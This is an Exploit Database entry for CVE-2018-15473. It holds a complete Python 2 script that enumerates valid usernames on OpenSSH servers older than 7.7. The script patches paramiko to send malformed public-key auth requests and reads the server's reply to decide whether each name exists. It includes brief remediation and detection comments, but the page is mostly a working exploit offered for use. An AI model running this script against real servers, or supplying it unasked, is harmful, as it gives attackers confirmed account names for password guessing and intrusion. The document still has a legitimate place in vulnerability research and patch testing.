

 Exploit Database Exploit Database


OpenSSH < 7.7 - User Enumeration (2)

EDB-ID:

45939


EDB Verified:

Type:

remote


Exploit:   /  

Platform:

Linux

Date:

2018-12-04


Vulnerable App:
#!/usr/bin/env python2
# CVE-2018-15473 SSH User Enumeration by Leap Security (@LeapSecurity) https://leapsecurity.io
# Credits: Matthew Daley, Justin Gardner, Lee David Painter
#
# Proof of concept for a username oracle in SSH public-key authentication.
# The script patches paramiko so that, once the server has accepted the
# service request, Message.add_boolean() writes nothing; the auth request
# that follows is therefore sent without its boolean field(s). The username
# is then classified by how the server reacts: MSG_USERAUTH_FAILURE is
# reported as "invalid", a paramiko AuthenticationException as "valid".
#
# Defensive notes:
#   - Remediation: run an OpenSSH release that includes the fix for
#     CVE-2018-15473. When valid and invalid names get the same response,
#     the output of this check no longer carries information.
#   - Detection: every probe is its own TCP connection and one failed
#     public-key attempt with a freshly generated key. Many such attempts for
#     different usernames from one source are worth alerting on.
#     NOTE(review): the exact sshd log lines depend on version and LogLevel;
#     confirm in your environment.
#   - A "valid" result only says the account name exists; it says nothing
#     about whether any credential for it would be accepted.
#
# Python 2 only (print statements). Exit codes: 1 = no arguments given,
# 2 = SSH transport negotiation failed, 3 = username reported invalid;
# a username reported valid falls through to a normal exit.
import argparse, logging, paramiko, socket, sys, os


# Raised from the patched MSG_USERAUTH_FAILURE handler to signal "invalid".
class InvalidUsername(Exception):
    pass


# No-op replacement for paramiko.message.Message.add_boolean: boolean fields
# are silently dropped, which is what makes the auth request malformed.
def add_boolean(*args, **kwargs):
    pass


# Keep paramiko's original MSG_SERVICE_ACCEPT handler so the wrapper below
# can still delegate to it.
old_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table[
    paramiko.common.MSG_SERVICE_ACCEPT]


# Wrapper installed for MSG_SERVICE_ACCEPT: swaps in the no-op add_boolean
# just before the original handler runs.
# NOTE(review): the patch is applied to the Message class itself and is never
# undone, so any other paramiko use in the same process is affected too.
def service_accept(*args, **kwargs):
    paramiko.message.Message.add_boolean = add_boolean
    return old_service_accept(*args, **kwargs)


# Handler installed for MSG_USERAUTH_FAILURE: this script treats that reply
# as the server's answer for a username that does not exist.
def invalid_username(*args, **kwargs):
    raise InvalidUsername()


# Install both handlers in paramiko's client handler table. This happens at
# module level, so it is in effect before check_user() is called.
paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = service_accept
paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = invalid_username


def check_user(username):
    """Send one malformed public-key auth request for *username* and print the verdict.

    Reads the target host and port from the module-level ``args`` namespace.
    Exits with status 2 if the SSH transport cannot be negotiated and with
    status 3 if the username is reported invalid; returns None otherwise.
    """
    # NOTE(review): neither the socket nor the transport is closed explicitly;
    # cleanup is left to process exit.
    sock = socket.socket()
    sock.connect((args.target, args.port))
    transport = paramiko.transport.Transport(sock)
    try:
        transport.start_client()
    except paramiko.ssh_exception.SSHException:
        print '[!] Failed to negotiate SSH transport'
        sys.exit(2)
    try:
        # The key is generated on the spot and is not expected to be
        # authorized anywhere; only the server's reaction matters.
        transport.auth_publickey(username, paramiko.RSAKey.generate(2048))
    except InvalidUsername:
        print "[-] {} is an invalid username".format(username)
        sys.exit(3)
    except paramiko.ssh_exception.AuthenticationException:
        # Any other exception type is not caught here and propagates.
        print "[+] {} is a valid username".format(username)


# Attach a NullHandler to paramiko's transport logger.
logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())

parser = argparse.ArgumentParser(description='SSH User Enumeration by Leap Security (@LeapSecurity)')
parser.add_argument('target', help="IP address of the target system")
parser.add_argument('-p', '--port', default=22, help="Set port of SSH service")
parser.add_argument('username', help="Username to check for validity.")

# With no arguments at all, show usage instead of argparse's error message.
if len(sys.argv) == 1:
    parser.print_help()
    sys.exit(1)

args = parser.parse_args()
check_user(args.username)
Tags:
Advisory/Source: Link
